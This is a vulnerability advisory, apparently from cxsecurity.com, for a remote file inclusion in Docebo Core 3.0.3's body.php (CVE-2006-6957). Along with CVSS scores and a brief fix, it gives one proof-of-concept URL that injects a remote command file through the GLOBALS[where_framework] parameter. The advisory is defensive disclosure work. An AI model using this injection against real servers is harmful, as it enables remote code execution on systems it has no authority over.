Bug: Docebo Core 3.0.3, Remote command execution ( Ascii Version )

Search:
WLB2

Docebo Core 3.0.3, Remote command execution

Published
Credit
Risk
2007.01.30
Federico Fazzi
Low
CWE
CVE
Local
Remote
CWE-94
CVE-2006-6957
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-----------------------------------------------------
Advisory id: FSA:008

Author: Federico Fazzi
Date: 09/06/2006, 6:44
Sinthesis: Docebo Core 3.0.3, Remote command execution
Type: high
Product: http://www.docebolms.org/
Patch: unavailable
-----------------------------------------------------

1) Description:

Error occured in body.php,

include_once($GLOBALS['where_framework']."/lib/lib.upload.php");

The users can include a remote file because
the $GLOBALS['where_framework'] isn't sanitized

2) Proof of concept:

http://example/[dc_path]/addons/mod_media/body.php?GLOBALS[where_framework]=[cmd_url]

3) Solution:

include file where are declare $GLOBALS[*]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version